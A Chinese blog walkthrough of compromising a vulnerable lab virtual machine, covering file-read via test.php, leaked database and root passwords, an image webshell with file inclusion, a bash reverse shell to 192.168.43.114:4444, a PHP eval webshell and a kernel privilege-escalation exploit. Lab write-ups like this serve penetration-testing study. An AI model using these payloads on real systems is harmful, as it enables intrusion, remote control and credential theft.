靶机渗透之抓住阿三

学习目的

技术小贴
技术小贴
  • SQL注入
  • 图片马上传
  • 文件包含漏洞利用
  • 反弹Shell
  • 权限提升

靶机搭建

下载链接

提取码: e436

网络配置:选择默认的桥接方式即可!

主机发现

ip发现

nmap -sP 192.168.43.1/24

Nmap scan report for 192.168.43.127
Host is up.

端口和服务识别

nmap -p- -A 192.168.43.127 -oN india_nmap.txt

  • A :全服务的深度识别
  • oN :输出到文本

漏洞挖掘

访问测试

靶机渗透之抓住阿三

发现提示:Show me your SQLI skills,明显这个登录脚本存在SQL注入,好吧开搞!

手工注入

万能密码跑起来:

admin 'or 'a'='a 
admin' or '1'='1

发现都不行啊,bie怪我了,上SQLMAP

SQLMAP

审计表单:

<form method="post">
<input type="text" name="un">
<input type="password" name="ps">
<input type="submit" name="login" value="let's login">
</form>

不难看出,这里以POST方式提交表单,其中用户名和密码的提交参数分别为unps

SQLMAP跑起来:

sqlmap.py -u "http://192.168.43.127/" --data "un=admin&ps=admin&login=let%27s+login" --dbms=mysql --level 2

  • 技巧:这里使用%27代替了let's中的单引号,避免语句报错!
all tested parameters do not appear to be injectable

SQLMAP也没跑出东西来,你是开玩笑吗,确定是线索SQL注入不是拿来忽悠我玩的?

换个思路,换个姿势,继续搞!

目录爆破

buster -u "http://192.168.43.127" -d=php.txt -t=5

200 OK-----http://192.168.43.127//add.php
200 OK-----http://192.168.43.127//index.php
200 OK-----http://192.168.43.127//head.php
200 OK-----http://192.168.43.127//test.php
200 OK-----http://192.168.43.127//show.php
200 OK-----http://192.168.43.127//phpmy
200 OK-----http://192.168.43.127//c.php
200 OK-----http://192.168.43.127//in.php
200 OK-----http://192.168.43.127//panel.php
200 OK-----http://192.168.43.127//phpmy/config.sample.inc.php

任意文件读取

访问http://192.168.43.127/test.php

靶机渗透之抓住阿三

  • 发现test.php可以传入file参数
  • 使用burp劫持该流量包,并修改为post方式,修改请求路径,请求/etc/passwd
    • 方式1:通过BurpSuite重放修改包
      • 直接截取test.php的GET包,尝试不成功
      • 截取登录脚本的POST包,并修改//test.php,并且添加file=../../../../etc/passwd,成功下载
    • 方式2:通过Mantra修改post参数
  • 可以成功下载/etc/passwdBurpSuiteMantra
    root:x:0:0:root:/root:/bin/bash
    www-data:x:33:33:www-data:/var/www:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    ica:x:1000:1000:ica,,,:/home/ica:/bin/bash

以同样方式,下载/etc/shadow,但是里面内容为空,无法利用,暂时不谈。

数据库密码泄露

通过上面的任意文件读取漏洞下载c.php,可以发现其中包含了数据库用户密码等敏感信息!

$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
#数据库名:ica_lab
#数据库用户:billu
#数据库密码:b0x_billu
mysql -h 192.168.43.127 -u  billu -p                                         
Enter password: *********                                                   
ERROR 2003 (HY000): Can't connect to MySQL server on '192.168.43.127' (10061)

虽然已经拿到了数据库的用户和密码,但是远程拒绝登录,暂时无法利用!

读取phpMyadmin配置文件

phpmyadmin默认后台配置文件:config.inc.php

利用test.php下载之:file=..%2f..%2f..%2fvar/www/phpmy/config.inc.php

<?php
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor';

直接发现root账户和密码:roottooroor

成功登录靶机:

打完收工?No,笔者又在网站层面发现了一个文件上传漏洞,同样可以Getshell,演述如下!

PhpMyadmin新建用户

访问链接:http://192.168.43.127/phpmy/

用户名:密码为billu:b0x_billu

在auth表中发现网站用户,并且新建用户:shavchen:password !

靶机渗透之抓住阿三

以刚才新建的shavchen用户登陆后台!

靶机渗透之抓住阿三

上传图片马

发现上传点:

在后台发现上传头像的地方,欲上传一只图片马儿,嗷嗷

靶机渗透之抓住阿三

上传图片马:

靶机渗透之抓住阿三

图片马地址:http://192.168.43.127/uploaded_images/shavchen.jpg

靶机渗透之抓住阿三

文件包含漏洞点

通过test.php下载pannel.php

if(isset($_POST['continue']))
{
	$dir=getcwd();
	$choice=str_replace('./','',$_POST['load']);
	
	if($choice==='add')
	{
			include($dir.'/'.$choice.'.php');
			die();
	}
	
		if($choice==='show')
	{
		
		include($dir.'/'.$choice.'.php');
		die();
	}
	else
	{
		include($dir.'/'.$_POST['load']);
	}
	
}

代码审计:

很明显,这里的include函数之前没有做限制,因此我们可以自定义包含的文件,即包含之前上传的图片马儿!

panel.php即登陆后的面板处理脚本,我们使用BurpSuite抓包,修改其参数,以包含我们的图片马。

文件包含漏洞利用

原始数据包:

POST /panel.php HTTP/1.1
Host: 192.168.43.127
Content-Length: 27
Cache-Control: max-age=0
Origin: http://192.168.43.127
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.43.127/panel.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=mbkq2m8ola4kos2cdj8g0sk7g3
Connection: close

load=show&continue=continue

修改后数据包:

POST /panel.php?cmd=%20cat%20/etc/passwd;ls HTTP/1.1
Host: 192.168.43.127
Content-Length: 27
Cache-Control: max-age=0
Origin: http://192.168.43.127
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.43.127/panel.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=mbkq2m8ola4kos2cdj8g0sk7g3
Connection: close

load=/uploaded_images/shavchen.jpg&continue=continue

靶机渗透之抓住阿三

至此,成功利用图片马突破被控主机,下一步,反弹shell并进行相关提权操作!

Getshell

Bash反弹一句话

echo "bash -i>& /dev/tcp/192.168.43.114/4444 0>&1" | bash
使用URL编码:
echo%20%22bash%20%2Di%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E43%2E114%2F4444%200%3E%261%22%20%7C%20bash

靶机渗透之抓住阿三

获取标准Shell

python -c 'import pty;pty.spawn("/bin/bash")'

权限提升

查看内核

www-data@indishell:/var/www$ uname -r
uname -r
3.13.0-32-generic

提权技巧

ubuntu 12.04 14.04 15.05 ---> CVE-2015-1328
centos redhat ---> 脏牛

提权操作

  • searchsploit ubuntu 12.04
  • cd /usr/share/exploitdb/exploit/linux/local
  • ls -l 37292.c
  • 将.c文件上传到目标机器
  • gcc 37292.c -o exp
  • ./exp

靶机渗透之抓住阿三

文件上传

1.菜刀上传

利用刚才的文件包含漏洞,向uploaded_images目录下写入一句话脚本,再使用菜刀连接之!

echo "<?php eval ($_POST['123456']);?>" >>caidao.php
编码后:
echo%20%22%3C%3Fphp%20eval%20%28%24%5FPOST%5B%27123456%27%5D%29%3B%3F%3E%22%20%3E%3Ecaidao%2Ephp

2.Wget上传

Kali上开启python临时服务器,再在目标机上使用Wget的命令下载之!

#Kali
python -m SimpleHTTPServer 
#Target
wget http://yourip:8000/filename

靶机渗透之抓住阿三

3.Scp上传

#远程到本地
scp root@192.168.43.114:/tmp/exp.c /tmp/exp.c
#本地到远程
ssh /tmp/exp.c root@192.168.43.114:/tmp/exp.c

4.Terminal上传

直接使用Mobasterm终端连接工具,利用自带的SFTP模块上传文件!

总结

  • 高线程的目录爆破或者爬虫会造成Apache服务器的异常
    • service apache2 restart
  • root用户大部分时间无法直接登陆后台
  • jpg文件被包含到php主文件里面,可以解析为php脚本。
  • 图片马不可控,不一定会一次解析成功

原创文章,作者:小嵘源码,如若转载,请注明出处:https://www.lcpttec.com/asan/

(0)
上一篇 2019年9月30日 下午4:16
下一篇 2019年9月30日 下午4:26

相关推荐

  • C语言

    基础 数据类型 C 中的类型可分为以下几种: 序号 类型与描述 1 基本类型: 它们是算术类型,包括两种类型:整数类型和浮点类型。 2 枚举类型: 它们也是算术类型,被用来定义在程序中只能赋予其一定的离散整数值的变量。 3 void 类型: 类型说明符 void 表明没有可用的值。 4 派生类型: 它们包括:指针类型、数组类型、结构类型、共用体类型和函数类型…

    2019年9月30日
    2.1K0
  • About A Blog

    博客的搭建 环境安装 安装git 安装node.js 安装hexo ​ npm install -g hexo-cli 测试是否成功安装 $ hexo -v hexo: 3.4.2 生成博客雏形 cd进入一个博客的目录,如D:My Blog 初始化博客 ​ hexo init hexo会将这个文件夹初始化成一个博客专用文件夹,生成过程稍微要点时间,耐心等待。…

    2019年9月30日
    1.8K0
  • VIRMACH:黑色星期五活动VPS

    今天,小编继续来推荐外贸建站服务器VPS。VIRMACH:黑色星期五活动VPS。 黑色星期五活动VPS 需要的可以去看一看,附上实时更新的监控! 地址:http://virma.ch/2019bf  

    2019年11月30日
    1.8K0
  • 国外VPS购买推荐帖子:RADWEBHOSTING

    国外VPS购买推荐帖子:RADWEBHOSTING,本方法由峰哥博客提供。工具:谷歌浏览器+谷歌浏览器上面的谷歌自动翻译。(谷歌翻译英文嘛,但博主英文好,是不需要翻译英文的,啊哈哈哈哈哈) 活动配置如下; 内存:1024MB Cpu:1 × 2.6GHz + 硬盘:20GB RAID 10 流量:1000GB IP:1个专用IPv4 IPV6:64 IPv6…

    2019年11月30日
    1.1K0
  • 推荐一款免费的网站后门在线查杀工具

    网络安全,对于各位站长来说,现在是至关重要。网站被黑,网站被挂后门,可能会造成各种的损失。做好网络安全防护对于SEO优化也是至关重要的一步,保护好自己的网站,也能保护好自己网站的排名。这次,小编来推荐一款免费的网站后门在线查杀工具,希望对大家有帮助。 最近网站被挂马劫持风险非常之高,负责的几个网站都被植入后门和挂马,网站流量深受其害,今天为大家介绍一款在线木…

    2019年12月15日
    2.4K0
  • PSKHOSTING:国外黑色星期五主机空间1$一年

    外贸建站推荐 PSKHOSTING:国外黑色星期五主机空间1$一年 国外黑色星期五主机空间1$一年 5 GB共享主机(1$); 可绑定1个域名 2个数据库 5 GB储存空间 150 GB每月传输 无限的FTP帐户 1个电子邮件帐号 购买地址:https://clients.pskhosting.com/cart.php?a=add&pid=115 6…

    2019年11月30日
    1.9K0
  • 关于BT服务器面板主题皮肤优化

    下面是 “关于宝塔服务器面板主题皮肤优化“ 的效果展示图,由娜云制作。小编只是转载。小编也希望大家用得开心,用得赏心悦目,以前那老土朴素的界面真的可以换一换皮肤了。 登陆界面 面板首页 文件管理 BTPanel 模板文件下载 使用方法: 1.解压覆盖到/www/server/panel/BTPanel/ 2.进入SSH,输入bt,选择9,清空面板缓存 3.清…

    2019年11月23日
    1.9K0
  • 极路由3刷openwrt

    开启开发者模式 登陆路由器管理界面 进入智能插件,选择去往插件市场 点击上方的”路由器信息” 进入高级设置,并按提示开通即可! 成功后提示:登陆地址为192.168.199.1,端口为1022,密码为登陆密码! 这时可以使用MobaXterm等终端工具连接极路由3,进入Shell界面了。 固件下载 为了避免刷机出现问题无法恢复到原来的状态, 需要先刷入一个 …

    2019年9月30日
    4.9K0
  • How to Make 图片马

    Copy命令制作 copy 1.png/b+1.php/a 2.png a 表示ascii文件 b 表示二进制文件 Cat命令制作 cat 1.png 1.php > 2.php 用于绕过getimagesize()函数的检查

    2019年9月26日
    1.5K0
  • CTF签到之html信息隐藏

    出题形式 Flag隐藏在html文件中,此类题目比较隐蔽,不易发现! 题目制作 1.新建1.html文档 <!DOCTYPE html> <html> <head> <title>请寻找Flag值</title> </head> <body> <h1>我就是一个简…

    2019年9月30日
    3.6K0
  • 关于博客站开源程序WordPress网站速度优化指导

    今天,小编来给大家说说 “关于WordPress博客类网站速度优化攻略”。希望对于用wordpress开源程序来建站的小伙伴有所帮助。 使用Wordpress搭建的网站普遍打开速度太慢,针于SEO来讲提升网站打开速度才能获得好的体验。如何提升Wordpress网站打开速度,让WP博客程序实现速度秒开,经过研究实践终于突破了速度这一难题。 要提升Wordpre…

    2019年12月15日
    1.9K0
  • Python

    基础语法 变量 变量存储在内存中的值。这就意味着在创建变量时会在内存中开辟一个空间。 基于变量的数据类型,解释器会分配指定内存,并决定什么数据可以被存储在内存中。 因此,变量可以指定不同的数据类型,这些变量可以存储整数,小数或字符。 变量赋值 #coding=utf-8 #!/usr/bin/python counter = 100 # 赋值整型变量 mil…

    2019年9月30日
    2.1K0